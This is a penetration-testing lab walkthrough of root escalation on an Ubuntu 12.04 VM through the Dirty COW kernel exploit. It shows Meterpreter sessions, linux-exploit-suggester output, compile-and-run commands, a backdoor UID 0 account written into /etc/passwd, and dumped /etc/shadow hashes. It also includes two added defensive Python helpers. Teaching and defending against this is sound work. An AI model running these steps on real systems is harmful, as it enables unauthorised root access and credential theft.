Linux Kernel Exploits
Linux Kernel Exploitation
Kernel exploits on Linux will typically target vulnerabilities in the Linux kernel to execute arbitrary code in order to run privileged system commands or to obtain a system shell.
This process will differ based on the Kernel version and distribution being targeted and the kernel exploit being used.
Privilege escalation through kernel exploits on Linux systems typically follows this methodology:
- Identifying kernel vulnerabilities
- Downloading, compiling and transferring kernel exploits onto the target system.
Tools & Environment
Linux-Exploit-Suggester - This tool is designed to assist in detecting security deficiencies for a given Linux kernel or Linux-based machine. It assesses (using heuristic methods) the exposure of the given kernel to every publicly known Linux kernel exploit.
GitHub: https://github.com/mzet-/linux-exploit-suggester
Note: The techniques demonstrated in this video are performed on an Ubuntu 12.04 VM.
Video
Perform some local enumeration:
meterpreter > sysinfo
What are the current privileges?
I am currently logged on to the target system with the privileges associated with the user account www-data. This is a service account that you typically find on a Linux system that hosts a web server: it is the account under which the web server itself (Apache or Nginx) runs, and it is generally unprivileged. The point is that if the web application or web server is exploited, this account acts as a safeguard: it is not a member of the sudo group or of any administrative group on the system, and it cannot execute commands that require root privileges.
meterpreter > getuid
Server username: www-data
Verify this by opening a shell session and obtaining a bash shell. List the groups that www-data belongs to: it is only a member of its own group. List the users. If we try to update the package repositories with sudo, it asks for a password, but because www-data is a service account it simply fails, as shown here. This means we need to elevate our privileges; we are targeting the root account, as that is the account with the highest privileges on a Linux system.
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ groups www-data
www-data@ubuntu:/tmp$ cat /etc/passwd
www-data@ubuntu:/tmp$ sudo apt-get update
sudo: no tty present and no askpass program specified
Sorry, try again.
www-data@ubuntu:/tmp$ ^C
The way we are going to obtain root access is through a kernel vulnerability, that is, a kernel exploit.
Navigate to the /tmp directory within the Linux file system. It is the directory that stores temporary files.
meterpreter > cd /tmp
meterpreter > ls
meterpreter > upload ~/Desktop/Linux-Enum/les.sh
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x les.sh
www-data@ubuntu:/tmp$ ls -alps
www-data@ubuntu:/tmp$ ./les.sh
www-data@ubuntu:/tmp$ ^C
Download the exploit code from ExploitDB.
As for compiling the exploit, there are a few techniques that can be used. The first is to compile it locally on Kali Linux; alternatively, you can transfer the source over to the target system and compile it there.
sudo apt-get install gcc
cd Downloads
mv 40839.c dirty.c
ls
gcc -pthread dirty.c -o dirty -lcrypt
ls
Transfer this over to the target system and see whether it works. If it doesn't, we will need to compile the C code on the target system.
meterpreter > upload ~/Download/dirty
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty password123
We get a few errors here; this is because the exploit was not compiled on that system, and the binary built on Kali depends on newer library versions than the target provides.
www-data@ubuntu:/tmp$ rm dirty
www-data@ubuntu:/tmp$ ^C
meterpreter > upload ~/Downloads/dirty.c
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty password123
www-data@ubuntu:/tmp$ cat /etc/passwd
www-data@ubuntu:/tmp$ su firefart
Log in with ssh. List a file that is only accessible by the root user or by users with root privileges, such as the /etc/shadow file.
ssh firefart@10.10.10.15
firefart@ubuntu:~# sudo apt-get update
firefart@ubuntu:~# apt-get update
firefart@ubuntu:~# whoami
firefart@ubuntu:~# cat /etc/shadow
That is how to elevate your privileges on a Linux system through the use of a kernel exploit.
Home Lab
Target: 192.168.248.132
┌──(root㉿kali)-[~]
└─# nmap -sV 192.168.248.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 23:12 EDT
Nmap scan report for 192.168.248.132
Host is up (0.000053s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:D1:6F:51 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.248.148:1234
[*] Sending stage (3020772 bytes) to 192.168.248.132
[*] Meterpreter session 1 opened (192.168.248.148:1234 -> 192.168.248.132:49452) at 2022-10-27 23:19:04 -0400
meterpreter > sysinfo
Computer : 192.168.248.132
OS : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > shell
Process 1660 created.
Channel 1 created.
/bin/bash -i
www-data@ubuntu:/opt/exploits$ groups www-data
groups www-data
www-data : www-data
www-data@ubuntu:/opt/exploits$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/opt/exploits$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
Use Meterpreter to upload linux-exploit-suggester.sh to the target's /tmp directory.
www-data@ubuntu:/tmp$ ls -al
ls -al
total 112
drwxrwxrwt 5 root root 4096 Oct 27 20:23 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rw-rw-r-- 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2013-2094] perf_swevent
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass
[+] [CVE-2013-2094] perf_swevent 2
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Exposure: probable
Tags: debian=7.0|8.0,[ ubuntu=* ]
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2014-4699] ptrace/sysret
Details: http://www.openwall.com/lists/oss-security/2014/07/08/16
Exposure: probable
Tags: [ ubuntu=12.04 ]
Download URL: https://www.exploit-db.com/download/34134
[+] [CVE-2014-4014] inode_capable
Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
Exposure: probable
Tags: [ ubuntu=12.04 ]
Download URL: https://www.exploit-db.com/download/33824
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2018-1000001] RationalLove
Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
Exposure: less probable
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-9322] BadIRET
Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
Exposure: less probable
Tags: RHEL<=7,fedora=20
Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/39230
[+] [CVE-2014-5207] fuse_suid
Details: https://www.exploit-db.com/exploits/34923/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/34923
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-1959] userns_root_sploit
Details: http://www.openwall.com/lists/oss-security/2013/04/29/1
Exposure: less probable
Download URL: https://www.exploit-db.com/download/25450
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0809] death_star (sudo)
Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436
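Both the tool description at the top of the page and the report above use the same LES output format; here is a small triage parser for it, added as an example (not code from the page or from the linux-exploit-suggester project). The names parse_les_report, matched_tag and triage are my own, and the sample report is constructed from the entries shown above with the URL lines dropped.

```python
"""Triage helper for linux-exploit-suggester (LES) reports.

Added example; not code from the original page or from the LES project. It
parses the report format shown above ("[+] [CVE-...] name" headers followed by
"Exposure:", "Tags:", "Comments:" ... fields) and ranks the findings so an
administrator can see which CVEs the host is most exposed to and patch first.
"""
import re
from collections import defaultdict

# LES prints exactly these exposure labels; lower rank = more urgent.
EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2}
HEADER_RE = re.compile(r"^\[\+\]\s+\[(?P<cves>[^\]]+)\]\s+(?P<name>.+?)\s*$")
FIELD_RE = re.compile(r"^\s*(?P<key>Details|Exposure|Tags|Download URL|ext-url|Comments):\s*(?P<val>.*?)\s*$")
MATCHED_TAG_RE = re.compile(r"\[\s*([^\]]+?)\s*\]")  # LES brackets the tag matching this host


def parse_les_report(text):
    """Return one dict per '[+]' finding: its CVE list, name and the fields below it."""
    findings, current = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {"cves": [c.strip() for c in m.group("cves").split(",")],
                       "name": m.group("name"), "exposure": "unknown", "tags": ""}
            findings.append(current)
        elif current is not None:  # skip the preamble and "cat: write error" noise
            f = FIELD_RE.match(line)
            if f:
                current[f.group("key").lower().replace(" ", "_")] = f.group("val")
    return findings


def matched_tag(finding):
    """The distro/kernel tag LES bracketed as matching this host, or None."""
    m = MATCHED_TAG_RE.search(finding["tags"])
    return m.group(1) if m else None


def triage(findings, min_exposure="probable"):
    """CVE ids grouped by exposure label, keeping findings at or above min_exposure.
    A CVE appears once even when LES lists several exploits for it
    ("dirtycow" and "dirtycow 2" are both CVE-2016-5195)."""
    cutoff = EXPOSURE_RANK[min_exposure]
    grouped = defaultdict(set)
    for fnd in findings:
        rank = EXPOSURE_RANK.get(fnd["exposure"])
        if rank is not None and rank <= cutoff:
            grouped[fnd["exposure"]].update(fnd["cves"])
    return {label: sorted(cves) for label, cves in grouped.items()}


# Constructed sample, abridged from the report above (URL lines dropped).
SAMPLE_REPORT = """\
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
   Exposure: highly probable
   Tags: debian=7|8,RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*},[ ubuntu=16.04|14.04|12.04 ]
[+] [CVE-2016-5195] dirtycow 2
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic}
[+] [CVE-2013-2094] perf_swevent
   Exposure: highly probable
   Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],debian=7{kernel:3.2.0-4-amd64}
   Comments: No SMEP/SMAP bypass
[+] [CVE-2015-3202] fuse (fusermount)
   Exposure: probable
   Tags: debian=7.0|8.0,[ ubuntu=* ]
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04
"""
```

Feed it the saved output of `./linux-exploit-suggester.sh` and the "highly probable" group is the patch list to act on first; the bracketed tag tells you which distro/kernel match triggered each finding.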
Compile the C file on Kali and upload the compiled binary to the target.
┌──(root㉿kali)-[~/Downloads]
└─# ls
40839.c Nessus-10.2.0-debian9_amd64.deb
┌──(root㉿kali)-[~/Downloads]
└─# mv 40839.c dirty.c
┌──(root㉿kali)-[~/Downloads]
└─# gcc -pthread dirty.c -o dirty -lcrypt
The binary cannot be executed on the target.
meterpreter > getuid
Server username: www-data
meterpreter > upload /root/Downloads/dirty
[*] uploading : /root/Downloads/dirty -> dirty
[-] core_channel_open: Operation failed: 1
meterpreter > cd /tmp
meterpreter > upload /root/Downloads/dirty
[*] uploading : /root/Downloads/dirty -> dirty
[*] Uploaded -1.00 B of 17.27 KiB (-0.01%): /root/Downloads/dirty -> dirty
[*] uploaded : /root/Downloads/dirty -> dirty
meterpreter > shell
Process 4881 created.
Channel 3 created.
/bin/bash -i
www-data@ubuntu:/tmp$ ls -al
ls -al
total 132
drwxrwxrwt 5 root root 4096 Oct 27 20:52 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rw-rw-r-- 1 www-data www-data 17688 Oct 27 20:52 dirty
-rwxrwxr-x 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
www-data@ubuntu:/tmp$ chmod +x dirty
chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty
./dirty
./dirty: /lib/x86_64-linux-gnu/libcrypt.so.1: version `XCRYPT_2.0' not found (required by ./dirty)
./dirty: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./dirty)
Upload the C file directly to the target and compile it there.
meterpreter > ls
Listing: /tmp
=============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
041777/rwxrwxrwx 4096 dir 2022-10-27 22:13:45 -0400 VMwareDnD
100664/rw-rw-r-- 5006 fil 2022-10-27 23:55:52 -0400 dirty.c
100775/rwxrwxr-x 90917 fil 2022-10-27 23:23:42 -0400 linux-exploit-suggester.sh
040700/rwx------ 4096 dir 2022-10-27 22:13:45 -0400 vmware-root
040700/rwx------ 4096 dir 2022-10-27 22:13:45 -0400 vmware-root_1389-3980363888
meterpreter > shell
Process 9057 created.
Channel 1 created.
/bin/bash -i
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls -al
ls -al
total 136
drwxrwxrwt 5 root root 4096 Oct 27 21:03 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rwxrwxr-x 1 www-data www-data 14116 Oct 27 21:03 dirty
-rw-rw-r-- 1 www-data www-data 5006 Oct 27 20:55 dirty.c
-rwxrwxr-x 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
www-data@ubuntu:/tmp$ ./dirty password123
./dirty password123
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7f1e73243000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@ubuntu:/tmp$ /etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7f1e73243000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@ubuntu:/tmp$ cat /etc/passwd
cat /etc/passwd
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/tmp$ su firefart
su firefart
su: must be run from a terminal
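As an added example (not from the original page), a check for the kind of /etc/passwd tampering shown in the listing above: a UID 0 account other than root, a password hash sitting in passwd instead of shadow, and a truncated fragment of the old root line. The function name check_passwd and the sample inputs are mine; the tampered sample is abridged from the listing above.

```python
"""Integrity check for /etc/passwd aimed at the tampering shown above.

Added example; not code from the original page. The exploit overwrote the first
line of /etc/passwd with a new UID 0 account whose password hash sits directly
in the passwd file, and left a truncated fragment of the old root line behind.
check_passwd() parses passwd-format text and reports: UID 0 accounts other than
the expected ones, hashes stored in passwd instead of shadow, empty password
fields, malformed lines, and an expected UID 0 account that has disappeared.
"""


def check_passwd(text, expected_uid0=("root",)):
    """Return a list of (kind, line_no, message) findings; an empty list means clean."""
    findings, uid0_seen = [], set()
    for no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:  # a valid entry has exactly seven colon-separated fields
            findings.append(("malformed", no, f"{len(fields)} fields: {line!r}"))
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        if not uid.isdigit():
            findings.append(("malformed", no, f"non-numeric uid {uid!r} for {name}"))
            continue
        if int(uid) == 0:
            uid0_seen.add(name)
            if name not in expected_uid0:
                findings.append(("uid0", no, f"unexpected UID 0 account {name} (home {home}, shell {shell})"))
        if pw == "":
            findings.append(("nopass", no, f"empty password field for {name}: logs in without a password"))
        elif pw not in ("x", "*", "!"):  # anything else is a hash that belongs in /etc/shadow
            findings.append(("hash", no, f"password hash stored in passwd for {name}"))
    for name in expected_uid0:
        if name not in uid0_seen:  # line 0 = whole-file finding
            findings.append(("missing", 0, f"expected UID 0 account {name} is missing"))
    return findings


# Constructed samples: the first is abridged from the post-exploit listing above.
TAMPERED_PASSWD = """\
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
"""
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
"""

if __name__ == "__main__":
    for kind, no, msg in check_passwd(TAMPERED_PASSWD):
        print(f"[{kind}] line {no}: {msg}")
```

On a live host, run it over the contents of /etc/passwd and diff against a known-good copy; the exploit output above also leaves /tmp/passwd.bak behind, which is a second artifact worth looking for.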
firefart must have a password set in order to log in via ssh.
┌──(root㉿kali)-[~/Downloads]
└─# ssh firefart@192.168.248.132
firefart@192.168.248.132's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Thu Oct 27 21:21:48 2022
firefart@ubuntu:~# whoami
firefart
firefart@ubuntu:~# groups firefart
firefart : root
firefart@ubuntu:~# cat /etc/shadow
root:$6$/jLmt06/$G/0YOXYI78JSp/rucIyOJ2zUALrYEsXNoYXAYaaJDtVBM2r3euhocyt4rv/jJZrmMeQ4DxLSs5QhR8fa7cFNe.:19293:0:99999:7:::
daemon:*:19293:0:99999:7:::
bin:*:19293:0:99999:7:::
sys:*:19293:0:99999:7:::
sync:*:19293:0:99999:7:::
games:*:19293:0:99999:7:::
man:*:19293:0:99999:7:::
lp:*:19293:0:99999:7:::
mail:*:19293:0:99999:7:::
news:*:19293:0:99999:7:::
uucp:*:19293:0:99999:7:::
proxy:*:19293:0:99999:7:::
www-data:*:19293:0:99999:7:::
backup:*:19293:0:99999:7:::
list:*:19293:0:99999:7:::
irc:*:19293:0:99999:7:::
gnats:*:19293:0:99999:7:::
nobody:*:19293:0:99999:7:::
libuuid:!:19293:0:99999:7:::
syslog:*:19293:0:99999:7:::
messagebus:*:19293:0:99999:7:::
phos:$1$BGtRBZla$X2KekLHgNdS1Q52luDdFi.:19293:0:99999:7:::
sshd:*:19293:0:99999:7:::
firefart@ubuntu:~# uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux